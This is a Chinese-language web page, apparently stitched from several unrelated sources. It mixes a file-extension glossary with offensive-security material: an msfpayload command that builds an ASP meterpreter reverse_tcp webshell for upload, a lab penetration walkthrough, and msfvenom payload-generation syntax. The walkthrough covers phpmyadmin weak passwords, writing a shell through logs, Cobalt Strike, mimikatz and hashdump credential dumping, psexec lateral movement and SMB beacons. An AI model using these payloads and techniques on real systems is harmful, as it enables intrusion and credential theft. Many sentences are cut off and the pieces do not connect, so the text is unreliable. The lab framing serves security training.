可以通过指令查看msf里的payload 然后记住其位置:使用如下的指令来产生一个webshell,和前边将的msfpayload的用法类似,只不过这里生成的是一个网页脚本文件:
产生webshell
msfpayload windows/meterpreter/reverse_tcp LHOST=your_ip | msfencode -t asp -o webshell.asp
然后将此webshell上传到服务器(这个步骤要有上传权限.)
*.php是一种网络开发的程序,它在服务器端运行,也就是你如果想打开此文件(以网页的形式),必须为他配一台服务器或者安装一个基于本机的服务性质的软件!
后缀名大全
A:
①. .ace: ace.exe或winace生成的压缩文件
可以在各大的FTP pub/msdos utility之类地方寻找ain.exe
arj是一种非常常见的压缩文件格式,它可以支持带目录,多文件压缩,
.asp文件通常指的是Active Server Pages文件,这个文本文件可以
包括下列部分的任意组合:文本/HTML 标记/ASP 脚本命令,可以用
.asp文件也可能是一种文档格式的文件,可以用cajviewer打开.
一般用windows自带的媒体播放器就可以播放.
如果有单独的字幕文件,则可以用其它播放器.
B:
①. .BHX(BINHEX):
BinHex是苹果机器的一种编码方式.
WinZip可以解码. 将email以文本方式存盘,扩展名为.BHX,
就可以直接用WinZip解压了.
光盘映象文件,可以:
注意:有些BIN文件实际上就是ISO文件如果上面的办法有问题
可以直接将后缀改成iso,然后用WinImage解解看
b.用ISOBuster直接解BIN.
c.用daemon直接将BIN文件虚拟成光驱
C:
①. .caj: cajviewer,CAJ文件浏览器是中国学术期刊(光盘版)电子杂志社(CAJEJPH)
的产品.它是为中国期刊网()的全文检索,浏览开发的.
制作工具可以采用Html Help WorkShop.
①.0 .cpx: cpx是一种压缩过的矢量图格式,CorelDraw
D:
①. .dat:
一般指数据文件,比如某些音碟或者某些应用程序的数据.
是个很通用的扩展名(比如影碟,一般数据,......),无法判断用那个程序打开,
除非有更多信息,比如这些文件是做什么用的.
是某个软件附带的,还是独立存在的,等等.
DOS下:
foxbase
foxpro
Windows:
qview(快速查看)
FoxPro
Office中Excel等.
E:
①. .ecw: 有可能是ENSONIQ AudioPCI声卡的波表样本
eps是一种特殊的ps文件, 通常是嵌入其他文档中使用. 制作这种文件非常简单:
a) 在Windows中安装一台PostScript打印机(并不是真的要买一台, 仅仅是安装驱动
内嵌的PostScript, 打印端口设为FILE(在磁盘上创建文件);
打印机, 然后打印到文件, 文件名可取为xxx.eps, 这将是你所需要的eps文件.
很多常用软件,比如ACDSee、Word等都可打开eps文件.
F:
①. .fcd:用vitrul CD-ROM打开
G:
①. gerber file(.dat .rep .pho 文件): 电路图可以送去制板的
H:
实际是Ascii文件.
(在随机的Apple Internet Connect Kit上已带)
可以自动转成原来的Binary文件.
一般来说,你down了hqx格式的文件在PC上是派不上
什么用场的,当然你可以用来和别人交换word文件什么的.
I:
①. .icl:Icon Library,用AxIcons打开,一个专用的画图标的软件.
img是软盘image文件,一个img就是一个软盘,尼需要一个工具将这样
一般是光盘镜像,直接用来刻盘或者用winimage解开
也可以装一个虚拟光盘软件daemon直接将之虚拟成光盘.
J:
①.、.jpg,.jpeg:
.jpg是一种高压缩比的真彩图像文件格式,一般的图像处理软件都可以
显示jpg图像.推荐使用的看jpg程序有:在DOS下sea,在windows下用
acdsee,在UNIX下可以用xv来看jpg.
K:
①.、.kc:
可以用kingcopy打开.
L:
①. .lwp: Lotus WordPro 格式
文件需要lha.exe,在FTP的DOS utility目录下应该有.
好象以前有一种自解压然后运行的exe是用lha压的,lzh用winrar就能解
Access数据库锁定文件,纪录数据库的锁定信息,
比如是否被打开,是否以独占形式访问等等.
part 1:文件头,我见到的几个都是mstor打头的,文件头包括版本信息、注册表
的一些键值、图片的位置信息等等,关系不是很大,不必仔细研究.
jpeg文件的第七到第十个字节是"JFIF".每两张图片之间会有大量的字节
填充0,中间你会找到屏保运行时产生的临时文件的名字,如c:\\1.jpg;
由于jpg文件不校验字节和长度的,你可以随便取到临时文件名上面的哪个
0 上.把之间的部分拷贝出来另存为.jpg文件就可以了,
N:
①. .nb:Mathematica的一种文件格式把.
察看方法:
专门的查看软件:
了ngc的扩展名文件,可以更好的存储和读取文件,增加了对键盘的设置等等
①. .opx: Microsoft 组织结构图,用office自带的组件可以打开,
默认不安装,需要添加程序.
P:
①. .pdf:
pdf是adobe公司开发的一种类似于poscript的文件格式.可以用
prn文件是打印机文件,比如你在Word中选择"打印到文件"就会生成这种文件.
你可以把扩展名改为ps,然后用GSView打开.
或者用PrFile这个软件直接把prn文件送到PS打印机打印出来.
ps的意思是PostScript,这是一种页面描述语言,主要用于高质量打印.
在UNIX和windows下都可以用GhostView来看ps文件.其homepage是
如果你有PoscriptScript支持的打印机,可以直接打印PS文件.
如果你想制做PS文件,简单的办法是:在Windows下安装一个支持Post Script
Word下.然后选择"打印",选择那个PS兼容的驱动程序,然后选择"print to file",
它将把打印输出送到一个文件中去.因为你用了一个Poscript 的打印驱动程序,
那么这个打印文件就是PostScript文件了.将该文件改名字为XXX.ps就可以了.
gzipped postsript 文件,可以用gsview直接打开,其支持gzip
①.0 .psf: outline PostScript printer font (ChiWriter)
①.1 .ptl: AUTOCAD做出来的打印文件
Q:
R:
rar是一种压缩文件格式,在DOS下解开RAR可以用rar.exe,在各大FTP
里面都可以找到,一般在pub/msdosutility之类地方.需要注意的是rar
rar的命令行参数几乎和arj一样,rar x -v -y filename.rar
DOS下的软件不支持长文件名,所以如果你的rar里面有长文件名并且因为
是easy cd或者winoncd等软件做的CDROM的ISO镜像
RAW属于MODE1的
可用Photoshop看.
是很小的音乐压缩格式,使用realplayer可以播放.
是模拟器的文件吧.
RPM 是Redhat Package Manager 的简写.
是Linux 底下的软件包管理系统.
到Linux 底下用使用rpm 来对它进行操作.
REALPLAYER在INTERNET上播放RA流.
可以用realplayer 打开.
rich text format
S:
①.、.sfe:file split 分割文件.
用file split 可以把他们合并成原来的zip文件.
或许还有自动合并得bat文件呢.
Shell Archive, 文本格式的打包文件,类似tar, 不过tar生成的为binary file,在UNIX下sh *.shar 即可解包, 或用专门的 shar/unshar utilities.
是microsoft的help workshop的图形处理工具生成的图形文件,
是用来在help中调用的.
Macintosh Stuffit archives,
as well as UUE (uuencoded), HQX (BinHex), bin (MacBinary), ZIP, ARC,
ARJ, and GZ archives
use "Aladdin Expander" to expand
Syntax file of Edit Plus
是Flash的动画格式,如果浏览器装了插件,可以用浏览器打开,但最好用
Flash Player Browser打开.
Scientific Word Place
①.0、.spw
SigmaPlot Worksheet
T:
①.、.tar.GZ or .tar:
.tar.gz,或者.tgz的文件一般是在UNIX下用tar和gunzip压缩的文件.
可能的文件名还有.tar.GZ等.gunzip是一种比pkzip压缩比高的压缩 程序,一般UNIX下都有.tar是一个多文件目录打包器,一般也是在unix下.
如果是.tar.Z的文件的话可以用uncompress先解开外面一层,然后用
tar xvf filename.tar解开tar文件.在PC下还是用winzip.
.tex本身是个文本文件,必须经过编译成dvi文件,使用winLatex就可以,如果你有 unix当然会带TeX或LaTex的.
U:
①.、.ufo:
问:这种文件要用什么程序打开?quick view plus 可以吗?
答1:使用photoimpact应该可以.
我们知道,exe文件或者其他二进制文件是不可以直接用email
(如下面的样子),然后就可以被接收方还原.
之前的部分删除,然后改文件名为.uu,然后用uudecode解开.
V:
①.、.vcd:
一般是virtual driver的虚拟光驱文件
也可以转换成iso,用daemon打开,参见格式转换,.vcd-.iso
另外金山影霸的文件也可能是vcd.
是地址本文件,用outlook express可以打开,(双击就可以).
DVD数据文件
VOS 是一款强大的电子琴模拟软件,.vos文件可以用它打开.
用Winamp播放,需要装相应的插件.
visio画的流程图
visio template file
W:1、.wdl:
WINDOWS的图元文件,用ACDSEE可以看,WORD也可以打开.
WPD是corel公司的wordperfect字处理软件的文档的扩展名.
winamp的skin,down下来以后是wsz格式ws打开一个winzip先,然后用winzip里的open.......
X:
①.、.xls:
MicroSoft Excel的文件.
eXtensible Markup Language
才能正常显示.
Y:
......
Z:
①.、.zip:
zip是一种最常见的压缩格式,在UNIX下解开zip用unzip命令.
在PC下解开zip可以用pkunzip.exe,一般在大ftp里面都可以找到,
或者用winzip解开.pkunzip -d filename.zip可以带目录结构解开文件
msf的payload中能建立反弹shell的,比如reverse_tcp,像是windows/meterpreter/reverse_tcp或者是android/meterpreter/reverse_tcp,它们的LHOST参数(LHOST就是Local host的意思)是攻击方的IP地址,用来监听对方的连接的.其实很好理解,反弹shell嘛,就是建立反弹连接的,当然是反弹到攻击主机了.
如果不是建立反弹shell的payload,一般是没有LHOST的,取而代之的是RHOST参数,是目标主机的IP地址.
配置网络
在VM虚拟机中按照下边的网络拓扑进行配置网络.网络拓扑图如下:
外网打点
针对此靶场进行外网渗透拿权限大致有这几种方法:
通过phpmyadmin弱口令,进入phpmyadmin后台.然后知识点就变成了,通过phpmyadmin进行getshell,这个点又分为,得到网站绝对路径后,使用select into outfile的方式写shell和利用日志写shell.在此处,我是使用日志写shell的方法拿到权限.因为secure_file_priv配置为null,禁止修改目录下的文件,也就不能使用into outfile的方式写入shell.
获得webshell的信息收集
通过外网打点获得的webshell,可以进行一波信息收集,摸清我是谁?我在哪?有没有内网环境?有没有杀软?通过拿到webshell后的信息收集的结果来评估一下有没有必要继续深入或者初步了解继续深入的话需要哪些手段.
我是谁?
蚁剑已经给出基础信息
我在哪?
使用ipconfig /all 看一下网络信息
目标有两个网卡,并且存在域环境,那么就有打它内网的必要了.
有没有杀软?
tasklist查看一下进程信息
根据进程查一下是否有杀软
目标没有使用杀软,还有域环境那么让它直接cs上线.
内网渗透
cs上线
内网信息收集
信息收集每个人都有自己的习惯,信息收集的顺序和信息收集的项目也都不太一样,只要根据自己的习惯和嗅觉,针对目标具体情况进行收集,以求尽快的拿下目标就好.信息收集的越全面突破口也就会越多,考虑到篇幅和文章内容匹配度等因素,此处并没有写出大量信息收集方法.
使用cs自带的net view查看域信息.
因为拿到的是管理员权限,可以先抓一波密码.用 cs 的 hashdump 读内存密码,用 mimikatz 读注册表密码:logonpasswords.
此处打码的地方是因为配置靶机登陆时靶机提示重置密码,我给靶机改了个包含个人信息的密码.蠢哭.拿到密码后,目标主机没有开启防火墙,可以使用cs自带的psexec做一波横向,因为抓到很多域中机器密码,域控密码也抓到了.
内网横向(通过登录凭证)
这个靶机设置的比较简单,抓到密码后,因为抓到了域控登陆的凭证,那么使用psexec即可横向内网所有机器.因为,另外两台内网的机器不出网,那么就到了本文着重练习的点了,打不出网的机器.
不出网机器上线一般有以下几种方式:
使用smb beacon
配置listener通过HTTP代理上线
这几种方式之前有师傅也在先知写过 <<不出网主机上线方法>> .此处我采用的SMB beacon这个方法.
SMB Beacon使用命名管道通过父级Beacon进行通讯,当两个Beacons链接后,子Beacon从父Beacon获取到任务并发送.因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB beacon相对隐蔽.SMB beacon不能直接生成可用载荷, 只能使用 PsExec 或 Stageless Payload 上线.
使用条件
只能链接由同一个 Cobalt Strike 实例管理的 Beacon.
利用这种beacon横移必须有目标主机的管理员权限或者说是拥有具有管理员权限的凭据.
使用方法:
①建立smb的listener
使用这种方法上线的机器,主要是通过出网机作为一个中间人,不出网主机成功上线后,如果出网机一断开,这个不出网主机也会断.
msf
从msf分离出的exe
nessus里的exe
cs插件
这个图片的ip可能跟上边配置符不起来,因为我在测试过程中,网断过几次,ip就变了.所以,在打的时候,如果ladon和分离出的exe没有打成,不要轻易放弃,用msf在打打试试,毕竟工具就是工具,不能过分依赖某个工具.
查看路由
run get_local_subnets
添加路由
查看添加的路由
run autoroute -p
小贴士:
漏洞检测方法:
之后设置一下目标ip和线程即可,这里因为已经扫出存在漏洞的机器了,也就不在叙述.
漏洞利用常使用的是:
这里的第一个和第三个模块需要目标开启命名管道,并且比较稳定.第二个模块只要存在漏洞即可,但是会有概率把目标打蓝屏,而且杀软拦截也会比较严格,如果有杀软就基本可以放弃这个模块了.
如果命令执行成功的话就可以优先考虑
这两个模块进行利用.
总结
这个靶场设计的技能点比较基础,外网打点获得shell后,直接可以通过cs上线,在管理员权限下,抓取密码,新建一个smb beacon然后使用psexec对内网两台不出网的机器进行横向.
metasploit-framework旗下的msfpayload(荷载生成器),msfencoder(编码器),msfcli(监听接口)已然成为历史,取而代之的是msfvenom.
正所谓万变不离其宗,了解原理是最重要的.
现在,metasploit-framework完美搭档是msfvenom◆msfcosole
下面,我们就来看一下msfvenom.
root@localhost:~# msfvenom -h
Error: MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] var=val
Options:
-p, --payload payload Payload to use. Specify a '-' or stdin to use custom payloads
--payload-options List the payload's standard options
-l, --list [type] List a module type. Options are: payloads, encoders, nops, all
-n, --nopsled length Prepend a nopsled of [length] size on to the payload
-f, --format format Output format (use --help-formats for a list)
--help-formats List available formats
-e, --encoder encoder The encoder to use
-a, --arch arch The architecture to use
--platform platform The platform of the payload
--help-platforms List available platforms
-s, --space length The maximum size of the resulting payload
--encoder-space length The maximum size of the encoded payload (defaults to the -s value)
-b, --bad-chars list The list of characters to avoid example: '\x00\xff'
-i, --iterations count The number of times to encode the payload
-x, --template path Specify a custom executable file to use as a template
-k, --keep Preserve the template behavior and inject the payload as a new thread
-o, --out path Save the payload
-v, --var-name name Specify a custom variable name to use for certain output formats
--smallest Generate the smallest possible payload
-h, --help Show this message
root@localhost:~#
一,msfvenom生成payload的常见格式为:
最简单型:
msfvenom -p payload payload options -f format -o path
编码处理型:
msfvenom -p payload payload options -a arch --platform platform -e encoder option -i encoder times -b bad-chars -n nopsled -f format -o path
注入exe型◆编码:
msfvenom -p payload payload options -a arch --plateform platform -e encoder option -i encoder times -x template -k keep -f format -o path
拼接型:
msfvenom -c shellcode -p payload payload options -a arch --platform platform -e encoder option -i encoder times -f format -o path
-o输出参数可以用""号代替
-f指定格式参数可以用单个大写字母代替:
例如:X 代表 -f exe
[H]arp
[P]erl
Rub[Y]
[R]aw
[J]s
e[X]e
[D]ll
[V]BA
[W]ar
Pytho[N]
①.、打开msf,输入命令use auxiliary/gather/shodan_search.
注意事项:
Metasploit的设计初衷是打造成一个攻击工具开发平台,本书稍后将讲解如何开发攻击工具.然而在目前情况下,安全专家以及业余安全爱好者更多地将其当作一种点几下鼠标就可以利用其中附带的攻击工具进行成功攻击的环境.
以上就是土嘎嘎小编为大家整理的msf生成php相关主题介绍,如果您觉得小编更新的文章只要能对粉丝们有用,就是我们最大的鼓励和动力,不要忘记讲本站分享给您身边的朋友哦!!